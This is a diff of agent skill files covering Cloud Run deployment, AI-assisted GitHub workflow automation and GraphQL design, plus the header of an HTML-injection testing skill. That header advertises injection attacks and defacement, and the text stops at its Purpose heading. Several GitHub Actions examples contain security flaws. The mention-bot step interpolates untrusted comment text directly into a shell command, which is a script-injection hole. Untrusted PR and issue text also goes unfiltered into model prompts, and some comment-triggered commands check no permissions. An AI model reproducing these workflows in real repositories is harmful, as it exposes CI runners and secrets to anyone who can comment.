- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
|
||||
entrypoint: gcloud
|
||||
args:
|
||||
- 'run'
|
||||
- 'deploy'
|
||||
- 'my-service'
|
||||
- '--image=gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA'
|
||||
- '--region=us-central1'
|
||||
- '--platform=managed'
|
||||
- '--allow-unauthenticated'
|
||||
- '--memory=512Mi'
|
||||
- '--cpu=1'
|
||||
- '--min-instances=1'
|
||||
- '--max-instances=100'
|
||||
|
||||
```
|
||||
|
||||
### Cloud Run Functions Pattern

Event-driven functions (formerly Cloud Functions)

**When to use**: simple event handlers, Pub/Sub message processing, Cloud Storage triggers, HTTP webhooks

```javascript
// HTTP Function
// index.js
const functions = require('@google-cloud/functions-framework');

functions.http('helloHttp', (req, res) => {
  const name = req.query.name || req.body.name || 'World';
  res.send(`Hello, ${name}!`);
});
```

```javascript
// Pub/Sub Function
const functions = require('@google-cloud/functions-framework');

functions.cloudEvent('processPubSub', (cloudEvent) => {
  // Decode Pub/Sub message
  const message = cloudEvent.data.message;
  const data = message.data
    ? JSON.parse(Buffer.from(message.data, 'base64').toString())
    : {};

  console.log('Received message:', data);

  // Process message
  processMessage(data);
});
```

```javascript
// Cloud Storage Function
const functions = require('@google-cloud/functions-framework');

functions.cloudEvent('processStorageEvent', async (cloudEvent) => {
  const file = cloudEvent.data;

  console.log(`Event: ${cloudEvent.type}`);
  console.log(`Bucket: ${file.bucket}`);
  console.log(`File: ${file.name}`);

  if (cloudEvent.type === 'google.cloud.storage.object.v1.finalized') {
    await processUploadedFile(file.bucket, file.name);
  }
});
```

```bash
# Deploy HTTP function
gcloud functions deploy hello-http \
  --gen2 \
  --runtime nodejs20 \
  --trigger-http \
  --allow-unauthenticated \
  --region us-central1

# Deploy Pub/Sub function
gcloud functions deploy process-messages \
  --gen2 \
  --runtime nodejs20 \
  --trigger-topic my-topic \
  --region us-central1

# Deploy Cloud Storage function
gcloud functions deploy process-uploads \
  --gen2 \
  --runtime nodejs20 \
  --trigger-event-filters="type=google.cloud.storage.object.v1.finalized" \
  --trigger-event-filters="bucket=my-bucket" \
  --region us-central1
```
### Cold Start Optimization Pattern

Minimize cold start latency for Cloud Run

**When to use**: latency-sensitive applications, user-facing APIs, high-traffic services

#### 1. Enable Startup CPU Boost

```bash
gcloud run deploy my-service \
  --cpu-boost \
  --region us-central1
```

#### 2. Set Minimum Instances

```bash
gcloud run deploy my-service \
  --min-instances 1 \
  --region us-central1
```

#### 3. Optimize Container Image

```dockerfile
# Use distroless for minimal image
FROM node:20-slim AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production

FROM gcr.io/distroless/nodejs20-debian12
WORKDIR /app
COPY --from=builder /app/node_modules ./node_modules
COPY src ./src
CMD ["src/index.js"]
```

#### 4. Lazy Initialize Heavy Dependencies

```javascript
// Lazy load heavy libraries
let bigQueryClient = null;

function getBigQueryClient() {
  if (!bigQueryClient) {
    const { BigQuery } = require('@google-cloud/bigquery');
    bigQueryClient = new BigQuery();
  }
  return bigQueryClient;
}

// Only initialize when needed
app.get('/api/analytics', async (req, res) => {
  const client = getBigQueryClient();
  const results = await client.query({...});
  res.json(results);
});
```

#### 5. Increase Memory (More CPU)

```bash
# Higher memory = more CPU during startup
gcloud run deploy my-service \
  --memory 1Gi \
  --cpu 2 \
  --region us-central1
```
## Anti-Patterns

### ❌ CPU-Intensive Work Without Concurrency=1

**Why bad**: CPU is shared across concurrent requests. CPU-bound work
will starve other requests, causing timeouts.

### ❌ Writing Large Files to /tmp

**Why bad**: /tmp is an in-memory filesystem. Large files consume
your memory allocation and can cause OOM errors.

### ❌ Long-Running Background Tasks

**Why bad**: Cloud Run throttles CPU to near-zero when not handling
requests. Background tasks will be extremely slow or stall.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | Calculate memory including /tmp usage |
| Issue | high | Set appropriate concurrency |
| Issue | high | Enable CPU always allocated |
| Issue | medium | Configure connection pool with keep-alive |
| Issue | high | Enable startup CPU boost |
| Issue | medium | Explicitly set execution environment |
| Issue | medium | Set consistent timeouts |
846 skills/github-workflow-automation/SKILL.md Normal file
@@ -0,0 +1,846 @@
---
name: github-workflow-automation
description: "Automate GitHub workflows with AI assistance. Includes PR reviews, issue triage, CI/CD integration, and Git operations. Use when automating GitHub workflows, setting up PR review automation, creating GitHub Actions, or triaging issues."
---

# 🔧 GitHub Workflow Automation

> Patterns for automating GitHub workflows with AI assistance, inspired by [Gemini CLI](https://github.com/google-gemini/gemini-cli) and modern DevOps practices.

## When to Use This Skill

Use this skill when:

- Automating PR reviews with AI
- Setting up issue triage automation
- Creating GitHub Actions workflows
- Integrating AI into CI/CD pipelines
- Automating Git operations (rebases, cherry-picks)

---

## 1. Automated PR Review

### 1.1 PR Review Action

```yaml
# .github/workflows/ai-review.yml
name: AI Code Review

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  review:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write

    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Get changed files
        id: changed
        run: |
          files=$(git diff --name-only origin/${{ github.base_ref }}...HEAD)
          echo "files<<EOF" >> $GITHUB_OUTPUT
          echo "$files" >> $GITHUB_OUTPUT
          echo "EOF" >> $GITHUB_OUTPUT

      - name: Get diff
        id: diff
        run: |
          diff=$(git diff origin/${{ github.base_ref }}...HEAD)
          echo "diff<<EOF" >> $GITHUB_OUTPUT
          echo "$diff" >> $GITHUB_OUTPUT
          echo "EOF" >> $GITHUB_OUTPUT

      - name: AI Review
        uses: actions/github-script@v7
        with:
          script: |
            const { Anthropic } = require('@anthropic-ai/sdk');
            const client = new Anthropic({ apiKey: process.env.ANTHROPIC_API_KEY });

            const response = await client.messages.create({
              model: "claude-3-sonnet-20240229",
              max_tokens: 4096,
              messages: [{
                role: "user",
                content: `Review this PR diff and provide feedback:

            Changed files: ${{ steps.changed.outputs.files }}

            Diff:
            ${{ steps.diff.outputs.diff }}

            Provide:
            1. Summary of changes
            2. Potential issues or bugs
            3. Suggestions for improvement
            4. Security concerns if any

            Format as GitHub markdown.`
              }]
            });

            await github.rest.pulls.createReview({
              owner: context.repo.owner,
              repo: context.repo.repo,
              pull_number: context.issue.number,
              body: response.content[0].text,
              event: 'COMMENT'
            });
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
```
### 1.2 Review Comment Patterns

````markdown
# AI Review Structure

## 📋 Summary

Brief description of what this PR does.

## ✅ What looks good

- Well-structured code
- Good test coverage
- Clear naming conventions

## ⚠️ Potential Issues

1. **Line 42**: Possible null pointer exception

   ```javascript
   // Current
   user.profile.name;
   // Suggested
   user?.profile?.name ?? "Unknown";
   ```

2. **Line 78**: Consider error handling

   ```javascript
   // Add try-catch or .catch()
   ```

## 💡 Suggestions

- Consider extracting the validation logic into a separate function
- Add JSDoc comments for public methods

## 🔒 Security Notes

- No sensitive data exposure detected
- API key handling looks correct
````

### 1.3 Focused Reviews

```yaml
# Review only specific file types
- name: Filter code files
  run: |
    files=$(git diff --name-only origin/${{ github.base_ref }}...HEAD | \
      grep -E '\.(ts|tsx|js|jsx|py|go)$' || true)
    echo "code_files=$files" >> $GITHUB_OUTPUT

# Review with context
- name: AI Review with context
  run: |
    # Include relevant context files
    context=""
    for file in ${{ steps.changed.outputs.files }}; do
      if [[ -f "$file" ]]; then
        context+="=== $file ===\n$(cat $file)\n\n"
      fi
    done

    # Send to AI with full file context
```

---
## 2. Issue Triage Automation

### 2.1 Auto-label Issues

```yaml
# .github/workflows/issue-triage.yml
name: Issue Triage

on:
  issues:
    types: [opened]

jobs:
  triage:
    runs-on: ubuntu-latest
    permissions:
      issues: write

    steps:
      - name: Analyze issue
        uses: actions/github-script@v7
        with:
          script: |
            const issue = context.payload.issue;

            // Call AI to analyze
            const analysis = await analyzeIssue(issue.title, issue.body);

            // Apply labels
            const labels = [];

            if (analysis.type === 'bug') {
              labels.push('bug');
              if (analysis.severity === 'high') labels.push('priority: high');
            } else if (analysis.type === 'feature') {
              labels.push('enhancement');
            } else if (analysis.type === 'question') {
              labels.push('question');
            }

            if (analysis.area) {
              labels.push(`area: ${analysis.area}`);
            }

            await github.rest.issues.addLabels({
              owner: context.repo.owner,
              repo: context.repo.repo,
              issue_number: issue.number,
              labels: labels
            });

            // Add initial response
            if (analysis.type === 'bug' && !analysis.hasReproSteps) {
              await github.rest.issues.createComment({
                owner: context.repo.owner,
                repo: context.repo.repo,
                issue_number: issue.number,
                body: `Thanks for reporting this issue!

            To help us investigate, could you please provide:
            - Steps to reproduce the issue
            - Expected behavior
            - Actual behavior
            - Environment (OS, version, etc.)

            This will help us resolve your issue faster. 🙏`
              });
            }
```

### 2.2 Issue Analysis Prompt

```typescript
const TRIAGE_PROMPT = `
Analyze this GitHub issue and classify it:

Title: {title}
Body: {body}

Return JSON with:
{
  "type": "bug" | "feature" | "question" | "docs" | "other",
  "severity": "low" | "medium" | "high" | "critical",
  "area": "frontend" | "backend" | "api" | "docs" | "ci" | "other",
  "summary": "one-line summary",
  "hasReproSteps": boolean,
  "isFirstContribution": boolean,
  "suggestedLabels": ["label1", "label2"],
  "suggestedAssignees": ["username"] // based on area expertise
}
`;
```
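Model replies rarely come back as bare JSON; they often surround the object with prose. A tolerant parser is worth the few lines. This helper (`parseTriageResponse` is our name, not an SDK API) extracts the first JSON object from the reply and falls back to `"other"` for unknown types rather than mislabeling:

```javascript
// Extract a JSON object from a model reply that may surround it with prose,
// and sanity-check the "type" field against the prompt's allowed values.
function parseTriageResponse(text) {
  const start = text.indexOf('{');
  const end = text.lastIndexOf('}');
  if (start === -1 || end === -1 || end < start) {
    throw new Error('No JSON object found in model response');
  }
  const parsed = JSON.parse(text.slice(start, end + 1));
  const validTypes = ['bug', 'feature', 'question', 'docs', 'other'];
  if (!validTypes.includes(parsed.type)) {
    parsed.type = 'other'; // fall back rather than mislabel
  }
  return parsed;
}

const reply = 'Sure! {"type": "bug", "severity": "high", "hasReproSteps": false} Hope that helps.';
const analysis = parseTriageResponse(reply);
```

Failing loudly on unparseable output (rather than silently skipping triage) makes broken prompts visible in the workflow logs.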
### 2.3 Stale Issue Management

```yaml
# .github/workflows/stale.yml
name: Manage Stale Issues

on:
  schedule:
    - cron: "0 0 * * *" # Daily

jobs:
  stale:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/stale@v9
        with:
          stale-issue-message: |
            This issue has been automatically marked as stale because it has not had
            recent activity. It will be closed in 14 days if no further activity occurs.

            If this issue is still relevant:
            - Add a comment with an update
            - Remove the `stale` label

            Thank you for your contributions! 🙏

          stale-pr-message: |
            This PR has been automatically marked as stale. Please update it or it
            will be closed in 14 days.

          days-before-stale: 60
          days-before-close: 14
          stale-issue-label: "stale"
          stale-pr-label: "stale"
          exempt-issue-labels: "pinned,security,in-progress"
          exempt-pr-labels: "pinned,security"
```

---
## 3. CI/CD Integration

### 3.1 Smart Test Selection

```yaml
# .github/workflows/smart-tests.yml
name: Smart Test Selection

on:
  pull_request:

jobs:
  analyze:
    runs-on: ubuntu-latest
    outputs:
      test_suites: ${{ steps.analyze.outputs.suites }}

    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Analyze changes
        id: analyze
        run: |
          # Get changed files
          changed=$(git diff --name-only origin/${{ github.base_ref }}...HEAD)

          # Determine which test suites to run
          suites="[]"

          if echo "$changed" | grep -q "^src/api/"; then
            suites=$(echo $suites | jq '. + ["api"]')
          fi

          if echo "$changed" | grep -q "^src/frontend/"; then
            suites=$(echo $suites | jq '. + ["frontend"]')
          fi

          if echo "$changed" | grep -q "^src/database/"; then
            suites=$(echo $suites | jq '. + ["database", "api"]')
          fi

          # If nothing specific, run all
          if [ "$suites" = "[]" ]; then
            suites='["all"]'
          fi

          echo "suites=$suites" >> $GITHUB_OUTPUT

  test:
    needs: analyze
    runs-on: ubuntu-latest
    strategy:
      matrix:
        suite: ${{ fromJson(needs.analyze.outputs.test_suites) }}

    steps:
      - uses: actions/checkout@v4

      - name: Run tests
        run: |
          if [ "${{ matrix.suite }}" = "all" ]; then
            npm test
          else
            npm test -- --suite ${{ matrix.suite }}
          fi
```
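The shell-and-jq step above is just a path-prefix-to-suites mapping. The same logic as a pure function (the prefixes are this workflow's example layout, not a convention) is easier to unit-test and extend:

```javascript
// Map changed file paths to the test suites that should run.
// Mirrors the shell/jq logic in the workflow above; prefixes are examples.
function selectSuites(changedFiles) {
  const rules = [
    { prefix: 'src/api/', suites: ['api'] },
    { prefix: 'src/frontend/', suites: ['frontend'] },
    { prefix: 'src/database/', suites: ['database', 'api'] },
  ];
  const selected = new Set();
  for (const file of changedFiles) {
    for (const rule of rules) {
      if (file.startsWith(rule.prefix)) {
        rule.suites.forEach((s) => selected.add(s));
      }
    }
  }
  // If nothing matched, fall back to running everything
  return selected.size > 0 ? [...selected] : ['all'];
}

const suites = selectSuites(['src/database/schema.sql', 'README.md']);
```

Note the fail-open default: unmatched changes (docs, configs) still run the full suite rather than nothing.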
### 3.2 Deployment with AI Validation

```yaml
# .github/workflows/deploy.yml
name: Deploy with AI Validation

on:
  push:
    branches: [main]

jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Get deployment changes
        id: changes
        run: |
          # Get commits since last deployment
          last_deploy=$(git describe --tags --abbrev=0 2>/dev/null || echo "")
          if [ -n "$last_deploy" ]; then
            changes=$(git log --oneline $last_deploy..HEAD)
          else
            changes=$(git log --oneline -10)
          fi
          echo "changes<<EOF" >> $GITHUB_OUTPUT
          echo "$changes" >> $GITHUB_OUTPUT
          echo "EOF" >> $GITHUB_OUTPUT

      - name: AI Risk Assessment
        id: assess
        uses: actions/github-script@v7
        with:
          script: |
            // Analyze changes for deployment risk
            const prompt = `
            Analyze these changes for deployment risk:

            ${process.env.CHANGES}

            Return JSON:
            {
              "riskLevel": "low" | "medium" | "high",
              "concerns": ["concern1", "concern2"],
              "recommendations": ["rec1", "rec2"],
              "requiresManualApproval": boolean
            }
            `;

            // Call AI and parse response
            const analysis = await callAI(prompt);

            if (analysis.riskLevel === 'high') {
              core.setFailed('High-risk deployment detected. Manual review required.');
            }

            return analysis;
        env:
          CHANGES: ${{ steps.changes.outputs.changes }}

  deploy:
    needs: validate
    runs-on: ubuntu-latest
    environment: production
    steps:
      - name: Deploy
        run: |
          echo "Deploying to production..."
          # Deployment commands here
```
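One detail worth making explicit when an AI verdict gates a deploy: the gate should fail closed. A hypothetical helper sketching that policy — anything unparseable, missing, or outside the known risk levels blocks the deploy, as does an explicit `requiresManualApproval`:

```javascript
// Decide whether a deployment should be blocked, given the risk JSON the
// workflow above asks the model for. Treat anything malformed or unknown
// as high risk (fail closed). Hypothetical helper, not a GitHub API.
function shouldBlockDeploy(analysis) {
  if (!analysis || typeof analysis !== 'object') return true;
  const known = ['low', 'medium', 'high'];
  if (!known.includes(analysis.riskLevel)) return true;
  return analysis.riskLevel === 'high' || analysis.requiresManualApproval === true;
}

const blocked = shouldBlockDeploy({ riskLevel: 'medium', requiresManualApproval: false });
```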
### 3.3 Rollback Automation

```yaml
# .github/workflows/rollback.yml
name: Automated Rollback

on:
  workflow_dispatch:
    inputs:
      reason:
        description: "Reason for rollback"
        required: true

jobs:
  rollback:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Find last stable version
        id: stable
        run: |
          # Find last successful deployment
          stable=$(git tag -l 'v*' --sort=-version:refname | head -1)
          echo "version=$stable" >> $GITHUB_OUTPUT

      - name: Rollback
        run: |
          git checkout ${{ steps.stable.outputs.version }}
          # Deploy stable version
          npm run deploy

      - name: Notify team
        uses: slackapi/slack-github-action@v1
        with:
          payload: |
            {
              "text": "🔄 Production rolled back to ${{ steps.stable.outputs.version }}",
              "blocks": [
                {
                  "type": "section",
                  "text": {
                    "type": "mrkdwn",
                    "text": "*Rollback executed*\n• Version: `${{ steps.stable.outputs.version }}`\n• Reason: ${{ inputs.reason }}\n• Triggered by: ${{ github.actor }}"
                  }
                }
              ]
            }
```

---
## 4. Git Operations

### 4.1 Automated Rebasing

```yaml
# .github/workflows/auto-rebase.yml
name: Auto Rebase

on:
  issue_comment:
    types: [created]

jobs:
  rebase:
    if: github.event.issue.pull_request && contains(github.event.comment.body, '/rebase')
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
          token: ${{ secrets.GITHUB_TOKEN }}

      - name: Setup Git
        run: |
          git config user.name "github-actions[bot]"
          git config user.email "github-actions[bot]@users.noreply.github.com"

      - name: Rebase PR
        run: |
          # Fetch PR branch
          gh pr checkout ${{ github.event.issue.number }}

          # Rebase onto main
          git fetch origin main
          git rebase origin/main

          # Force push
          git push --force-with-lease
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Comment result
        uses: actions/github-script@v7
        with:
          script: |
            github.rest.issues.createComment({
              owner: context.repo.owner,
              repo: context.repo.repo,
              issue_number: context.issue.number,
              body: '✅ Successfully rebased onto main!'
            })
```

### 4.2 Smart Cherry-Pick

```typescript
// AI-assisted cherry-pick that handles conflicts
async function smartCherryPick(commitHash: string, targetBranch: string) {
  // Get commit info
  const commitInfo = await exec(`git show ${commitHash} --stat`);

  // Check for potential conflicts
  const targetDiff = await exec(
    `git diff ${targetBranch}...HEAD -- ${affectedFiles}`
  );

  // AI analysis
  const analysis = await ai.analyze(`
    I need to cherry-pick this commit to ${targetBranch}:

    ${commitInfo}

    Current state of affected files on ${targetBranch}:
    ${targetDiff}

    Will there be conflicts? If so, suggest resolution strategy.
  `);

  if (analysis.willConflict) {
    // Create branch for manual resolution
    await exec(
      `git checkout -b cherry-pick-${commitHash.slice(0, 7)} ${targetBranch}`
    );
    const result = await exec(`git cherry-pick ${commitHash}`, {
      allowFail: true,
    });

    if (result.failed) {
      // AI-assisted conflict resolution
      const conflicts = await getConflicts();
      for (const conflict of conflicts) {
        const resolution = await ai.resolveConflict(conflict);
        await applyResolution(conflict.file, resolution);
      }
    }
  } else {
    await exec(`git checkout ${targetBranch}`);
    await exec(`git cherry-pick ${commitHash}`);
  }
}
```
### 4.3 Branch Cleanup

```yaml
# .github/workflows/branch-cleanup.yml
name: Branch Cleanup

on:
  schedule:
    - cron: '0 0 * * 0' # Weekly
  workflow_dispatch:

jobs:
  cleanup:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Find stale branches
        id: stale
        run: |
          # Branches not updated in 30 days
          stale=$(git for-each-ref --sort=-committerdate refs/remotes/origin \
            --format='%(refname:short) %(committerdate:relative)' | \
            grep -E '[3-9][0-9]+ days|[0-9]+ months|[0-9]+ years' | \
            grep -v 'origin/main\|origin/develop' | \
            cut -d' ' -f1 | sed 's|origin/||')

          echo "branches<<EOF" >> $GITHUB_OUTPUT
          echo "$stale" >> $GITHUB_OUTPUT
          echo "EOF" >> $GITHUB_OUTPUT

      - name: Create cleanup PR
        if: steps.stale.outputs.branches != ''
        uses: actions/github-script@v7
        with:
          script: |
            const branches = `${{ steps.stale.outputs.branches }}`.split('\n').filter(Boolean);

            const body = `## 🧹 Stale Branch Cleanup

            The following branches haven't been updated in over 30 days:

            ${branches.map(b => `- \`${b}\``).join('\n')}

            ### Actions:
            - [ ] Review each branch
            - [ ] Delete branches that are no longer needed
            - Comment \`/keep branch-name\` to preserve specific branches
            `;

            await github.rest.issues.create({
              owner: context.repo.owner,
              repo: context.repo.repo,
              title: 'Stale Branch Cleanup',
              body: body,
              labels: ['housekeeping']
            });
```
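Grepping git's relative-date strings (as the shell step above does) is fragile across locales and git versions. The same staleness filter computed from commit timestamps, as a sketch (branch names and the `{ name, lastCommit }` shape are illustrative):

```javascript
// Filter branches whose last commit is older than a cutoff. Input is an
// array of { name, lastCommit } pairs with timestamps in milliseconds.
// A timestamp-based alternative to grepping git's relative dates.
function staleBranches(branches, now, maxAgeDays, protectedNames) {
  const maxAgeMs = maxAgeDays * 24 * 60 * 60 * 1000;
  return branches
    .filter((b) => !protectedNames.includes(b.name))
    .filter((b) => now - b.lastCommit > maxAgeMs)
    .map((b) => b.name);
}

const DAY = 24 * 60 * 60 * 1000;
const now = 100 * DAY;
const stale = staleBranches(
  [
    { name: 'main', lastCommit: 99 * DAY },
    { name: 'feature/old', lastCommit: 10 * DAY },   // 90 days old
    { name: 'feature/fresh', lastCommit: 95 * DAY }, // 5 days old
  ],
  now,
  30,
  ['main', 'develop']
);
```

In a workflow, the timestamps could come from `git for-each-ref --format='%(refname:short) %(committerdate:unix)'`.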
---

## 5. On-Demand Assistance

### 5.1 @mention Bot

```yaml
# .github/workflows/mention-bot.yml
name: AI Mention Bot

on:
  issue_comment:
    types: [created]
  pull_request_review_comment:
    types: [created]

jobs:
  respond:
    if: contains(github.event.comment.body, '@ai-helper')
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Extract question
        id: question
        run: |
          # Extract text after @ai-helper
          question=$(echo "${{ github.event.comment.body }}" | sed 's/.*@ai-helper//')
          echo "question=$question" >> $GITHUB_OUTPUT

      - name: Get context
        id: context
        run: |
          if [ "${{ github.event.issue.pull_request }}" != "" ]; then
            # It's a PR - get diff
            gh pr diff ${{ github.event.issue.number }} > context.txt
          else
            # It's an issue - get description
            gh issue view ${{ github.event.issue.number }} --json body -q .body > context.txt
          fi
          echo "context=$(cat context.txt)" >> $GITHUB_OUTPUT
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: AI Response
        uses: actions/github-script@v7
        with:
          script: |
            const response = await ai.chat(`
            Context: ${process.env.CONTEXT}

            Question: ${process.env.QUESTION}

            Provide a helpful, specific answer. Include code examples if relevant.
            `);

            await github.rest.issues.createComment({
              owner: context.repo.owner,
              repo: context.repo.repo,
              issue_number: context.issue.number,
              body: response
            });
        env:
          CONTEXT: ${{ steps.context.outputs.context }}
          QUESTION: ${{ steps.question.outputs.question }}
```
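The `sed 's/.*@ai-helper//'` step above keeps everything after the last mention. The equivalent extraction in JavaScript, with trimming and a null result when the mention is absent:

```javascript
// Extract the question that follows the @ai-helper mention, mirroring the
// sed 's/.*@ai-helper//' step above (sed's greedy .* matches up to the
// LAST occurrence, so we use lastIndexOf here too).
function extractQuestion(commentBody, mention = '@ai-helper') {
  const idx = commentBody.lastIndexOf(mention);
  if (idx === -1) return null;
  return commentBody.slice(idx + mention.length).trim();
}

const q = extractQuestion('Hey @ai-helper can you explain this regex?');
```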
### 5.2 Command Patterns

```markdown
## Available Commands

| Command              | Description                 |
| :------------------- | :-------------------------- |
| `@ai-helper explain` | Explain the code in this PR |
| `@ai-helper review`  | Request AI code review      |
| `@ai-helper fix`     | Suggest fixes for issues    |
| `@ai-helper test`    | Generate test cases         |
| `@ai-helper docs`    | Generate documentation      |
| `/rebase`            | Rebase PR onto main         |
| `/update`            | Update PR branch from main  |
| `/approve`           | Mark as approved by bot     |
| `/label bug`         | Add 'bug' label             |
| `/assign @user`      | Assign to user              |
```
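A sketch of parsing the slash commands from the table into a `{ command, args }` pair, so one workflow can dispatch `/label bug`, `/assign @user`, and friends (the parser shape is ours; only the command names come from the table above):

```javascript
// Parse a slash command from a comment body into { command, args }.
// Returns null for comments that are not commands.
function parseCommand(body) {
  const match = body.trim().match(/^\/(\w+)(?:\s+(.*))?$/);
  if (!match) return null;
  return { command: match[1], args: match[2] ? match[2].split(/\s+/) : [] };
}

const labelCmd = parseCommand('/label bug');
const rebaseCmd = parseCommand('/rebase');
```

Anchoring the regex to the whole comment (`^...$`) keeps prose that merely mentions `/rebase` from triggering the bot.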
---

## 6. Repository Configuration

### 6.1 CODEOWNERS

```
# .github/CODEOWNERS

# Global owners
* @org/core-team

# Frontend
/src/frontend/ @org/frontend-team
*.tsx @org/frontend-team
*.css @org/frontend-team

# Backend
/src/api/ @org/backend-team
/src/database/ @org/backend-team

# Infrastructure
/.github/ @org/devops-team
/terraform/ @org/devops-team
Dockerfile @org/devops-team

# Docs
/docs/ @org/docs-team
*.md @org/docs-team

# Security-sensitive
/src/auth/ @org/security-team
/src/crypto/ @org/security-team
```

### 6.2 Branch Protection

```yaml
# Set up via GitHub API
- name: Configure branch protection
  uses: actions/github-script@v7
  with:
    script: |
      await github.rest.repos.updateBranchProtection({
        owner: context.repo.owner,
        repo: context.repo.repo,
        branch: 'main',
        required_status_checks: {
          strict: true,
          contexts: ['test', 'lint', 'ai-review']
        },
        enforce_admins: true,
        required_pull_request_reviews: {
          required_approving_review_count: 1,
          require_code_owner_reviews: true,
          dismiss_stale_reviews: true
        },
        restrictions: null,
        required_linear_history: true,
        allow_force_pushes: false,
        allow_deletions: false
      });
```

---

## Best Practices

### Security

- [ ] Store API keys in GitHub Secrets
- [ ] Use minimal permissions in workflows
- [ ] Validate all inputs
- [ ] Don't expose sensitive data in logs

### Performance

- [ ] Cache dependencies
- [ ] Use matrix builds for parallel testing
- [ ] Skip unnecessary jobs with path filters
- [ ] Use self-hosted runners for heavy workloads

### Reliability

- [ ] Add timeouts to jobs
- [ ] Handle rate limits gracefully
- [ ] Implement retry logic
- [ ] Have rollback procedures

---

## Resources

- [Gemini CLI GitHub Action](https://github.com/google-github-actions/run-gemini-cli)
- [GitHub Actions Documentation](https://docs.github.com/en/actions)
- [GitHub REST API](https://docs.github.com/en/rest)
- [CODEOWNERS Syntax](https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners)
68 skills/graphql/SKILL.md Normal file
@@ -0,0 +1,68 @@
|
||||
---
name: graphql
description: "GraphQL gives clients exactly the data they need - no more, no less. One endpoint, typed schema, introspection. But the flexibility that makes it powerful also makes it dangerous. Without proper controls, clients can craft queries that bring down your server. This skill covers schema design, resolvers, DataLoader for N+1 prevention, federation for microservices, and client integration with Apollo/urql. Key insight: GraphQL is a contract. The schema is the API documentation. Design it carefully."
source: vibeship-spawner-skills (Apache 2.0)
---

# GraphQL

You're a developer who has built GraphQL APIs at scale. You've seen the
N+1 query problem bring down production servers. You've watched clients
craft deeply nested queries that took minutes to resolve. You know that
GraphQL's power is also its danger.

Your hard-won lessons: The team that didn't use DataLoader had unusable
APIs. The team that allowed unlimited query depth got DDoS'd by their
own clients. The team that made everything nullable couldn't distinguish
errors from empty data. You've learned these lessons the hard way.
## Capabilities

- graphql-schema-design
- graphql-resolvers
- graphql-federation
- graphql-subscriptions
- graphql-dataloader
- graphql-codegen
- apollo-server
- apollo-client
- urql

## Patterns

### Schema Design

Type-safe schema with proper nullability

### DataLoader for N+1 Prevention

Batch and cache database queries
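The DataLoader pattern can be sketched in a few lines of framework-free Python — resolvers queue keys during execution, then one batched fetch resolves them all (a minimal sketch; `batch_load_users` and its fake rows are hypothetical stand-ins for a real database query):

```python
from collections import OrderedDict

class DataLoader:
    """Minimal DataLoader sketch: dedupe keys, batch one fetch, cache results."""
    def __init__(self, batch_fn):
        self.batch_fn = batch_fn      # maps [keys] -> [values], same order
        self.cache = {}               # per-request result cache
        self.queue = OrderedDict()    # pending keys, insertion-ordered, deduped

    def load(self, key):
        if key not in self.cache:
            self.queue[key] = None            # same key queued only once
        return lambda: self.cache[key]        # thunk, resolved after dispatch

    def dispatch(self):
        keys = [k for k in self.queue if k not in self.cache]
        if keys:
            for k, v in zip(keys, self.batch_fn(keys)):
                self.cache[k] = v
        self.queue.clear()

calls = []
def batch_load_users(ids):
    """Hypothetical batched fetch; records one entry per DB round-trip."""
    calls.append(list(ids))
    return [{"id": i, "name": f"user{i}"} for i in ids]

loader = DataLoader(batch_load_users)
thunks = [loader.load(i) for i in (1, 2, 1, 3)]   # four resolver calls
loader.dispatch()                                  # ...one batched fetch
print(len(calls), calls[0])                        # 1 [1, 2, 3]
```

Four `load` calls collapse into a single deduplicated batch — the same shape the JS `dataloader` package gives Node resolvers.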
### Apollo Client Caching

Normalized cache with type policies

## Anti-Patterns

### ❌ No DataLoader

### ❌ No Query Depth Limiting

### ❌ Authorization in Schema

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Each resolver makes separate database queries | critical | Use DataLoader |
| Deeply nested queries can DoS your server | critical | Limit query depth and complexity |
| Introspection enabled in production exposes your schema | high | Disable introspection in production |
| Authorization only in schema directives, not resolvers | high | Authorize in resolvers |
| Authorization on queries but not on fields | high | Field-level authorization |
| Non-null field failure nullifies entire parent | medium | Design nullability intentionally |
| Expensive queries treated same as cheap ones | medium | Query cost analysis |
| Subscriptions not properly cleaned up | medium | Proper subscription cleanup |
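The depth-limit advice above can be enforced cheaply even before full parsing — a brace-counting estimate over the raw query string (a rough sketch; a production server should measure depth on the parsed AST, e.g. via graphql-core validation rules):

```python
def query_depth(query: str) -> int:
    """Estimate GraphQL selection-set nesting by tracking brace depth."""
    depth = max_depth = 0
    for ch in query:
        if ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth

shallow = "{ user { name } }"
nested = "{ user { posts { comments { author { posts { title } } } } } }"
MAX_DEPTH = 5

print(query_depth(shallow), query_depth(nested))  # 2 6
print(query_depth(nested) > MAX_DEPTH)            # True -> reject the query
```

A request whose estimated depth exceeds the limit is rejected before any resolver runs.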
## Related Skills

Works well with: `backend`, `postgres-wizard`, `nextjs-app-router`, `react-patterns`
495 skills/html-injection-testing/SKILL.md Normal file

@@ -0,0 +1,495 @@
---
name: HTML Injection Testing
description: This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". It provides comprehensive HTML injection attack techniques and testing methodologies.
---

# HTML Injection Testing

## Purpose

